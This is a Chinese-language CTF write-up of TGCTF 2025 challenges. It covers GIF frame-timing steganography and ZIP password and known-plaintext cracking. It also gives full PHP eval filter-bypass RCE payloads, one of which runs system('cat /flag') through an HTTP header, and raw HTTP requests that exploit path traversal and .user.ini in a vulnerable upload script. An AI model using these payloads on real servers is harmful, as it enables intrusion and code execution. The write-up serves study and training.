第二周复习比赛题目有感并复盘
本版仅收录部分题解
一.misc部分
1.这是啥
首先,经典题做习惯了,拿到个二维码就只知道去补定位块(你QR特有的边角定位块),比赛时很线性地将图片补上了定位块结果标准不对,下面附上常用的QR标准:
详见链接 二维码(QR code)基本知识 - jack_Meng - 博客园
二维码处理(notice:汉信码是用微信一般扫不出来的)
然后获取到hint:
time is your fortune ,efficiency is your life
返回对原GIF进行帧间隔提取(用puzzle solver),得到:
['840', '710', '670', '840', '700', '1230', '890', '1110', '1170', '950', '990', '970', '1170', '1030', '1040', '1160', '950', '1170', '1120', '950', '1190', '1050', '1160', '1040', '950', '1160', '1050', '1090', '1010', '330', '1250']
我们可以写出帧间隔转换出asscii码,代码实现如下:
enc=['840', '710', '670', '840', '700', '1230', '890', '1110', '1170', '950', '990', '970', '1170', '1030', '1040', '1160', '950', '1170', '1120', '950', '1190', '1050', '1160', '1040', '950', '1160', '1050', '1090', '1010', '330', '1250']
for i in enc:
i=int(i)//10 #整除
print(chr(i),end(''))
获得flag TGCTF{You_caught_up_with_time!}
2.ez_zip
前置知识
考点:压缩包修复,压缩包密码破解
hint:注意题目文件提示sh512
Victory_is_at_hand.zip//无密码
|_______Victory_is_at_hand _______flag
|_______ //1.弱密码爆破 _______flag.zip_________|//3.修复压缩包文件信息
|______end.zip_______|______sh512.txt
|______sh512.txt//2.明文攻击
1.使用Advanced Zip Archive 进行破解,获得密匙:
Advanced Archive Password Recovery 信息:
加密的 ZIP/RAR/ACE/ARJ/7ZP 文件: C:\Users\zhuji\Downloads\Victory_is_at_hand.zip
总计口令: 31,350,411
总计时间: 758ms
平均速度(口令/秒): 41,359,381
这个文件的口令 : 20250412
十六进制口令: 32 30 32 35 30 34 31 32
2.使用网站对文件内容加密获得:
0894fb7edcf85585e8749faeac3c7adf4247ae49b50cc55c4dd5eead0a9be60b7d848baece2ee65273d110317be4fe709c4b2bdeab48a212ca741e989df39963
3.属性查看(7-zip),确定压缩算法,压缩质量(fast/quaility),对sh512.txt压缩
名称: End.zip
加密: +
CRC: 3E6D597C
算法: ZipCrypto Deflate:Fastest
类型: zip
4.明文攻击,注意文件应该与压缩包内某文件CRC一致
Advanced Archive Password Recovery 统计信息:
加密的 ZIP/RAR/ACE/ARJ/7ZP 文件: C:\Users\zhuji\Downloads\End.zip
总计口令: n/a
总计时间: 3m 9s 468ms
平均速度(口令/秒): n/a
这个文件的口令 : 未找到
加密密钥: [ b39bc130 8183a9f1 d5381ad8 ]
5.文件修复
3.TeamGipsy&ctfer (待更)
二.web
1.AAA偷渡阴平(复仇)&& 普通
完全体源码:
<?php
$tgctf2025=$_GET['tgctf2025'];
if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|echo|readfile|highlight|show|source|file|assert/i", $tgctf2025)){
//hint:你可以对着键盘一个一个看,然后在没过滤的符号上用记号笔画一下(bushi
eval($tgctf2025);
}
else{
die('(╯‵□′)╯炸弹!•••*~●');
}
highlight_file(__FILE__);
通解
url传参
http://127.0.0.1:1439/?tgctf2025=session_start();system(hex2bin(session_id()));
bp放包
GET /?tgctf2025=session_start();system(hex2bin(session_id())); HTTP/1.1
Host: 127.0.0.1:1439
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
获得:TGCTF{1ab3b681-be70-8b9a-3b4e-b45efab6d394}
未ban无参RCE的方法
先fuzz测试,发现能执行RCE,诸如?tgctf2025=phpinfo(); (某些简单经典题的放法)?tgctf2025=print_r(pos(getallheaders()));(获得所有请求头,pos获得当前请求头位置,print_r输出请求头)
http://127.0.0.1:10174/?tgctf2025=print_r(pos(getallheaders()));
keep-alive <?php
$tgctf2025=$_GET['tgctf2025'];
if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $tgctf2025)){
//hint:你可以对着键盘一个一个看,然后在没过滤的符号上用记号笔画一下(bushi
eval($tgctf2025);
}
else{
die('(╯‵□′)╯炸弹!•••*~●');
}
highlight_file(__FILE__);
发现pos指向的头为Connection,遂构造payload
http://127.0.0.1:10174/?tgctf2025=eval(pos(getallheaders()));
GET /?tgctf2025=eval(pos(getallheaders())); HTTP/1.1
Host: 127.0.0.1:10174
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: system('cat /flag');
获得flag:TGCTF{1f8644bf-4035-6e98-5e7e-0d33b03a7261}
拓展阅读(鸽鸽鸽):
2.(ez)upload
考点:目录扫描,目录穿越,代码审计,MINE绕过,nignx默认设置对于uploads上传目录403更为严格的管控,.htaccess废弃,.user.ini的配合使用,对于文件上传%00截断,大写,多扩展名,php7绕过,and so on.
At first,it is hard to judge it since you are do not know the sourse code in the web page,approxilly ,we use disearch to make a simple directory search(Python version must>=3.10),the file was below:
upload.php #when we upload,the url will redirect into this php
index.php #main page logic
index.php.bak #can directly download to check
Guess the upload.php also have back file,directly visit it and open it.
<?php
define('UPLOAD_PATH', __DIR__ . '/uploads/');
$is_upload = false;
$msg = null;
$status_code = 200; // 默认状态码为 200
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php", "php5", "php4", "php3", "php2", "html", "htm", "phtml", "pht", "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf", "htaccess");
if (isset($_GET['name'])) {
$file_name = $_GET['name'];
} else {
$file_name = basename($_FILES['name']['name']);
}
$file_ext = pathinfo($file_name, PATHINFO_EXTENSION);
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['name']['tmp_name'];
$file_content = file_get_contents($temp_file);
if (preg_match('/.+?</s', $file_content)) {
$msg = '文件内容包含非法字符,禁止上传!';
$status_code = 403; // 403 表示禁止访问
} else {
$img_path = UPLOAD_PATH . $file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
$msg = '文件上传成功!';
} else {
$msg = '上传出错!';
$status_code = 500; // 500 表示服务器内部错误
}
}
} else {
$msg = '禁止保存为该类型文件!';
$status_code = 403; // 403 表示禁止访问
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
$status_code = 404; // 404 表示资源未找到
}
}
// 设置 HTTP 状态码
http_response_code($status_code);
// 输出结果
echo json_encode([
'status_code' => $status_code,
'msg' => $msg,
]);
Payload:
POST /upload.php?filename=../2.php7 HTTP/1.1
Host: 127.0.0.1:1786
Content-Length: 328
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Origin: http://127.0.0.1:1786
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjZ9Nij7et6ARYuwt
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:1786/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryjZ9Nij7et6ARYuwt
Content-Disposition: form-data; name="name"; filename="2.php7"
Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundaryjZ9Nij7et6ARYuwt
Content-Disposition: form-data; name="submit"
上传文件
------WebKitFormBoundaryjZ9Nij7et6ARYuwt--
构造恶意.user.ini配置,文件自动添加<?php phpinfo();?>,同样需要目录穿越
POST /upload.php?name=../.user.ini HTTP/1.1
Host: 127.0.0.1:1786
Content-Length: 316
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Origin: http://127.0.0.1:1786
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycwwSiKQAMI3rRJ0R
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:1786/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundarycwwSiKQAMI3rRJ0R
Content-Disposition: form-data; name="name"; filename=".user.ini"
Content-Type: application/octet-stream
auto_prepend_file=evil.png
------WebKitFormBoundarycwwSiKQAMI3rRJ0R
Content-Disposition: form-data; name="submit"
------WebKitFormBoundarycwwSiKQAMI3rRJ0R--
Refresh the upload website;
done!
TGCTF{9cd13fa9-e234-3e7d-ccca-63ccd54288ad}
由于我也不是生产队的驴,2025-4-15待更